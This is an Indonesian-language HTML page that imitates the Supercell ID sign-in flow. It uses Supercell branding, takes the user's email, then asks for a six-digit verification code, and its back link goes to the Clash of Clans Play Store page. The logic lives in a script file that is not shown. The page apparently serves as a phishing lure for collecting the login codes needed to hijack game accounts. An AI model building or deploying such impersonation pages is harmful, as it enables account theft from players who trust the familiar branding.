<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Supercell</title>
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="icon2.png" type="png/image">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css"/>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
</head>
<body>
    
    <main>
        <div class="container">
            <div class="logoSupercell">
                <img src="supercell.png" alt="">
            </div>
            <div class="labelBar">
                <span>Masuk</span>
                <span>Verifikasi</span>
            </div>
            <div class="progress-container">
                <div class="progress-bar" id="progressBar">
                  <div class="progress-indicator" id="progressIndicator"></div>
                </div>
            </div>
            <div class="isi-container1 show">
                <div class="bodyContainer">
                    <span>Masuk Ke Supercell ID</span>
                    <span>Masukkan email anda dan kami akan mengirimkan kode verifikasi.</span>
                </div>
                <form action="" method="post">
                    <div class="inputSupercell">
                        <input type="email" id="emailInput" placeholder="Masukkan Email" required>
                        <span>Situs ini dilindungi oleh reCAPTCHA. <a href="">Kebijakan Privasi</a> dan <a href="">Ketentuan Layanan</a> Google juga berlaku.</span>
                    </div>
                    <div class="button">
                        <button type="button" onclick="startVerification()">Log in</button>
                        <a href="https://play.google.com/store/apps/details?id=com.supercell.clashofclans&pcampaignid=web_share" target="_blank" class="kembaliContainer">Kembali</a>
                    </div>
                </form>
                <div class="pendaftaranSupercell">
                    <span onclick="faqPendaftaran()">Ingin mendaftar Supercell ID?</span>
                </div>
            </div>

            <div class="isi-container2">
                <div class="bodyContainer-2">
                    <span>Sedikit Lagi!</span>
                    <span>Kode verifikasi telah dikirimkan ke email</span>
                    <span id="emailTerkirim"></span>
                </div>
                <div class="codeContainer">
                    <div class="wrapper">
                        <input type="text" class="field 1" maxlength="1">
                        <input type="text" class="field 2" maxlength="1">
                        <input type="text" class="field 3" maxlength="1">
                        <input type="text" class="field 4" maxlength="1">
                        <input type="text" class="field 5" maxlength="1">
                        <input type="text" class="field 6" maxlength="1">
                    </div>
                </div>
                <button class="resend" onclick="kirimCode(this)">
                    Kirim ulang Code
                    <i class="fa fa-caret-right"></i>
                </button>
                <div class="container2-button">
                    <button onclick="verifikasiCode()">Kirim</button>
                    <button onclick="kembaliVerification()">Kembali</button>
                </div>
            </div>
        </div>
    </main>

    <script src="script.js"></script>
</body>
</html>


